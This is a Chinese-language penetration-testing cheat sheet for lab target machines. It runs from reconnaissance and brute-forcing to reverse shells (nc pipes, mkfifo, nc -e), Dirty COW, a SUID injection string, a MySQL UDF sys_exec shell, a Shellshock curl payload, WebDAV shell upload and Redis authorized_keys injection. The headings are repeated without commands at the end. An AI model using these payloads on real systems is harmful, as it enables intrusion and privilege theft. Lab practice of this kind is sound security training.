靶机打靶思路与方法
字数 711 2025-08-12 11:34:02

靶机渗透测试全面指南

一、信息收集阶段

1. 主机发现技术

  • ARP扫描:

    sudo arp-scan -l
for i in $(seq 1 254); do arping -c 2 10.0.2.$i; done
sudo netdiscover -r 10.0.2.0/16

  • ICMP扫描:

    nmap -sn 10.0.2.4/24
fping -gaq 10.0.2.0/24

2. 端口与服务探测

  • 快速扫描:

    masscan -p1-65535 10.0.2.4 --rate=1000

  • 详细扫描:

    nmap -p- 10.0.2.4
nmap -p22,80,... -A 10.0.2.4

  • 防火墙绕过:

    nmap --script=firewalk --traceroute 10.0.2.4

二、非Web服务攻击

1. 漏洞利用方法

  • ExploitDB利用:

    searchsploit openssh 7.2

  • Metasploit框架:

    msfconsole
use exploit/unix/ssh/...

  • 密码爆破:

    hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.4

三、Web应用渗透

1. 目录爆破技术

  • Feroxbuster:

    feroxbuster --url http://10.0.2.9

  • Gobuster:

    gobuster dir -u http://10.0.2.26 -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp

  • 子域名爆破:

    gobuster vhost -u http://cereal.ctf:44441 -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt

2. 参数爆破技术

  • FFuf工具: 
    ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:PARAM -w val.txt:VAL -u http://10.0.2.26/secret/evil.php?PARAM=VAL -fs 0

3. 403绕过技术

  • 头部修改: 
    GET / HTTP/1.1
X-Original-URL: /auth/login
X-Forwarded-For: 127.0.0.1

四、Shell获取与维持

1. 受限环境突破

  • 非交互式Shell升级:

    python3 -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=/bin/bash
export TERM=screen
stty rows 38 columns 116

  • 无-e参数的NC反弹:

    nc 10.0.2.4 3333 | /bin/bash | nc 10.0.2.4 4444
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.15 3333 >/tmp/f

五、Linux提权技术

1. 内核漏洞利用

  • 脏牛漏洞:

    gcc -pthread dirty.c -o dirty -lcrypt
./dirty

  • 自动化检测:

    ./linux-exploit-suggester.sh

2. SUID提权

  • 查找SUID文件:

    find / -perm -4000 -type f 2>/dev/null

  • 权限继承:

    ./update_cloudav "a | nc 10.0.2.4 5555 | /bin/bash | nc 10.0.2.4 6666"

3. MySQL提权

  • UDF提权: 
    use mysql;
create table aaa(line blob);
insert into aaa values(load_file('/tmp/udf.so'));
select * from aaa into dumpfile '/usr/lib/mysql/plugin/udf.so';
create function sys_exec returns integer soname 'udf.so';
select sys_exec('nc 10.0.2.15 4444 -e /bin/bash');

4. Capabilities提权

  • 检测Capabilities: 
    getcap -r / 2>/dev/null

六、特殊漏洞利用

1. Shellshock漏洞

  • 检测与利用: 
    nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh,cmd=ls 10.0.2.16
curl -H "user-agent:(); echo; /bin/bash -c 'nc -e /bin/bash 10.0.2.15 4444'" http://10.0.2.16/cgi-bin/shell.sh

2. WebDAV漏洞

  • 文件上传利用: 
    davtest -url http://10.1.8.133/webdav -auth user:pass -uploadfile shell.php -uploadloc rev.php

七、密码破解技术

1. John the Ripper

  • ZIP密码破解: 
    zip2john a.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

2. Steghide隐写分析

  • 隐写检测: 
    steghide info image.jpg
steghide --extract -sf image.jpg -p password

八、后渗透技巧

1. SSH密钥利用

  • 私钥利用: 
    chmod 600 id_rsa
ssh -i id_rsa user@10.0.2.4

2. Redis提权

  • SSH密钥注入: 
    (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > pub.txt
cat pub.txt | redis-cli -x set ssh_key
redis-cli
config set dir /root/.ssh
config set dbfilename "authorized_keys"
save

九、总结与最佳实践

  1. 信息收集要全面:不放过任何细节,包括隐藏文件、历史命令等
  2. 使用高质量字典:提高爆破成功率
  3. 多维持Shell:确保有多个访问途径
  4. 版本漏洞利用:及时更新漏洞库
  5. 权限提升路径:从内核、SUID、数据库等多角度尝试

通过系统性地应用这些技术,可以有效地进行靶机渗透测试和安全评估。

靶机渗透测试全面指南 一、信息收集阶段 1. 主机发现技术 ARP扫描 : ICMP扫描 : 2. 端口与服务探测 快速扫描 : 详细扫描 : 防火墙绕过 : 二、非Web服务攻击 1. 漏洞利用方法 ExploitDB利用 : Metasploit框架 : 密码爆破 : 三、Web应用渗透 1. 目录爆破技术 Feroxbuster : Gobuster : 子域名爆破 : 2. 参数爆破技术 FFuf工具 : 3. 403绕过技术 头部修改 : 四、Shell获取与维持 1. 受限环境突破 非交互式Shell升级 : 无-e参数的NC反弹 : 五、Linux提权技术 1. 内核漏洞利用 脏牛漏洞 : 自动化检测 : 2. SUID提权 查找SUID文件 : 权限继承 : 3. MySQL提权 UDF提权 : 4. Capabilities提权 检测Capabilities : 六、特殊漏洞利用 1. Shellshock漏洞 检测与利用 : 2. WebDAV漏洞 文件上传利用 : 七、密码破解技术 1. John the Ripper ZIP密码破解 : 2. Steghide隐写分析 隐写检测 : 八、后渗透技巧 1. SSH密钥利用 私钥利用 : 2. Redis提权 SSH密钥注入 : 九、总结与最佳实践 信息收集要全面 :不放过任何细节,包括隐藏文件、历史命令等 使用高质量字典 :提高爆破成功率 多维持Shell :确保有多个访问途径 版本漏洞利用 :及时更新漏洞库 权限提升路径 :从内核、SUID、数据库等多角度尝试 通过系统性地应用这些技术,可以有效地进行靶机渗透测试和安全评估。